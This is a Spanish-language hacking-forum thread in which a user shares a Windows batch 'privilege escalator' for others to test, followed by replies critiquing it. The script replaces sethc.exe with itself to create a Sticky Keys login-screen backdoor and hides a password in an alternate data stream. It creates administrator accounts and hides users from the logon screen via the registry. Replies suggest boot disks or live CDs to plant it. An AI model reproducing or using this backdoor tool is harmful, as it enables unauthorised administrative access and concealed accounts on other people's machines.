Este es un code que estoy realizando...
mode con cols=70
mode con lines=20
@echo off
title Escalador de Privilegios
color 0a
if exist "%windir%\system32\sethc.lz0" (goto load) else (goto ins)
:ins
echo.
echo Aun no se ha modificado el Sistema..
echo.
echo Presione una Tecla para realizar el Procedimiento, o salga
echo del programa si lo desea...
pause > nul
copy "%windir%\system32\sethc.exe" "%windir%\system32\sethc.lz0"
del /f "%windir%\system32\sethc.exe"
copy %0 "%windir%\system32\sethc.exe"
echo ni7vyk3t3hd2mkniyk3nnit>>"%windir%\system32\shell32.dll:admin.cuh"
cls
echo.
echo ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo º El cambio del archivo del Sistema usado para º
echo º la Escalada de privilegios se ha realizado º
echo º satisfactoriamente, tendra efecto la proxima º
echo º vez que vaya a Iniciar sesion... º
echo ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
echo.
echo Desea ver la Ayuda del Programa: Si [s] No [N]
echo.
set /p opc="> "
if %opc%==s call :help 2
if %opc%==S call :help 2
if %opc%==n (echo.&echo Gracias por Usar este Programa&pause&exit)
if %opc%==N (echo.&echo Gracias por Usar este Programa&pause&exit)
:load
cls
for /F "tokens=*" %%a in (%windir%\system32\shell32.dll:admin.cuh) do set conf=%%a
echo.
echo ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo º Escalada de Privilegios - CUH el-hacker.com º
echo ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
echo.
echo. El Programa se encuentra Protegido
echo. Por Favor Introduzca su Clave!
set /p q="Password > "
call :cript %q%
if %v%==%conf% (goto ini) else (cls&echo.&echo Clave Invalida...&echo.&echo Vuelva a Intentarlo&pause&goto load)
:ini
cls
echo.
echo ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo º Escalada de Privilegios - CUH el-hacker.com º
echo ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
echo.
echo Elija una Opcion:
echo.
echo ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
echo ³1³ ³ Agregar un Usuario.. ³ ³2³ ³ Esconder un usuario. ³
echo ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
echo ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
echo ³3³ ³ Eliminar un Usuario. ³ ³4³ ³ Ver Ayuda - Creditos ³
echo ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
echo ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
echo ³5³ ³ Salir del Programa. ³
echo ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
echo.
set /p opc="> "
if "opc"=="" (goto :ini)
set opc=%opc: =_%
set opc=%opc:&=_%
set opc=%opc:¡=_%
if %opc%==1 goto addadmin
if %opc%==2 goto hideuser
if %opc%==5 goto fin
if %opc%==4 call :help 1
if %opc%==3 (goto :delete) else (goto :err)
:err
cls
echo.
echo ERROR...
echo.
echo No ha escogido una Opcion Correcta
echo Vuelva a Intentarlo
echo.
pause
goto ini
:addadmin
cls
echo.
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo Escriba el Nombre del Nuevo usuario
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
set /p admin="> "
echo.
echo Escriba el la Clave para el Usuario: %admin%
echo.
set /p clave="> "
net user "%admin%" "%clave%" /add
net localgroup Administradores %admin% /add
echo.
echo ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo º Usuario Agregado Con Exito º
echo ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
pause >nul
goto ini
:delete
cls
echo.
echo Escriba El Nombre Del Usuario a Borrar:
echo.
set /p usdel="> "
net user "%usdel%" /delete
cls
echo.
echo Usuario Borrado Con Exito.
echo.
pause
goto ini
:hideuser
echo.
echo Escrilba la Cuenta o Nombre de Usuario
echo que desea esconder de la pantalla de
echo Inico de Sesion...
echo.
set /p hiden="> "
reg add "HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccount\UserList" /v "%hidden%" /t REG_DWORD /d 0 /f
echo.
echo El Usuario %hidden% fue Ocultado con Exito...
echo.
pause
goto ini
:help
cls
echo.
echo ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo º Escalada de Privilegios - CUH el-hacker.com º
echo ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
echo.
echo sección de Ayuda
echo ____________
echo ____________
echo ____________
echo ____________
echo Como se pueden dar cuenta, soy malo para las ayudas,
echo asi que podrian ayudarme ustedes...
echo.
echo :: SmartGenius :: - powered by iSmart, Corp.
echo.
echo Presione Cualquier tecla para continuar ¡
pause > nul
if %1==1 set ir=ini
if %1==2 set ir=fin
goto %ir%
:cript
set v=%1
set v=%v:&=_%
set v=%v: =_%
set v=%v:^=_%
set v=%v:#=_%
set v=%v:-=t%
set v=%v:.=a%
set v=%v:a=23%
set v=%v:e=ni%
set v=%v:h=r%
set v=%v:r=y%
set v=%v:c=mo%
set v=%v:d=z%
set v=%v:1=+%
set v=%v:2=k%
set v=%v:b=na%
set v=%v:d=15%
set v=%v:m=t3%
set v=%v:o=sm%
set v=%v:s=hd2%
set v=%v:l=7v%
goto :eof
:fin
echo MsgBox "Gracias por usar este Programa... ;)"^&vbCrLf^&vbCrLf^&"Para mas Info visita"^&vbCrLf^&"http://foro.elhacker.net", 64, "Escalador de Privilegios" >>%temp%\msgr.vbs
start %temp%\msgr.vbs
exit
El pass del programa: Adivinenlo ;D ;D
Espero que lo prueben y comenten, pros, contras, errores, arreglos, ayudas, mejoras...
Saludos.
Hola SmartGenius, yo creo que estaria bien que pusieras unos Errorlevel´s al usar los comandos Net, ya que habra veces en las que no siempre se podra agregar o eliminar un usuario, etc.
Saludos.
Mmm, voy a ver que onda con esto...
sodulaS :P
Tan solo me gustaría que me respondieras una pregunta ¿ Lo puedes utiliza si no estas logeado como Administrador por ejemplo que estés como invitado ???
Saludos...
Cita de: RockoX en 6 Mayo 2008, 06:20 AM
Hola SmartGenius, yo creo que estaria bien que pusieras unos Errorlevel´s al usar los comandos Net, ya que habra veces en las que no siempre se podra agregar o eliminar un usuario, etc.
Saludos.
Aun no tengo muy claro el manejo de errorlevel, pero si tu puedes ayudarme, pues bienvenido sea...
Cita de: No_NICK en 7 Mayo 2008, 02:12 AM
Tan solo me gustaría que me respondieras una pregunta ¿ Lo puedes utiliza si no estas logeado como Administrador por ejemplo que estés como invitado ???
Bueno, pues el codigo basicamente es para que reemplace a sethc, por si mismo (ya encapsulado en exe)... y asi al moemento de iniciar sesion uno presiona 5 veces shift y tiene acceso al programa que nos permite crearnos una cuenta de admin...
Siendo invitado no estoy seguro de su funcionamiento, pero hay otra forma de escalar privilegios con el comando at que funciona con cualquiera, de ahi podriamos tomar una base para mejorar el codigo y hacerlo mas efectivo...
Saludos.
Ok... :: SmartGenius :: fíjate para que funcione es necesario tener acceso local a la máquina durante una sesión de Administrador...
Seria tonto entonces utilizar ese BAT pues si ya tienes una sección como administrador para que te vas a tomar la molestia de ejecutarlo ?
Para que tú script tenga una utilidad Verdadera tendrías que crearte un cd, PenDriver ó Diskette de arranque de manera que cuando reinicies puedas modificar el archivo, otra opción seria iniciar sección con un CD de Linux Live y accedes a la partición de Windows y modificas ( en este ultimo caso no te servirá de mucho el .BAT que estas creando)
Al igual que el comando at solo serviría si solo si eres administrador y tienes acceso local a la maquina
Ahora bien si lo que deseas es hacer una herramienta que sirva para cambiar el password del administrador en caso de perdida "que es mas o menos lo que tienes ahora" para nada sera un "Escalador de Privilegios"
Saludos amigo, Espero no desanimarte....
...
Cita de: No_NICK en 9 Mayo 2008, 02:22 AM
Para que tú script tenga una utilidad Verdadera tendrías que crearte un cd, PenDriver ó Diskette de arranque de manera que cuando reinicies puedas modificar el archivo, otra opción seria iniciar sección con un CD de Linux Live y accedes a la partición de Windows y modificas ( en este ultimo caso no te servirá de mucho el .BAT que estas creando)
Agregale que necesitarías acceso físico a la máquina xD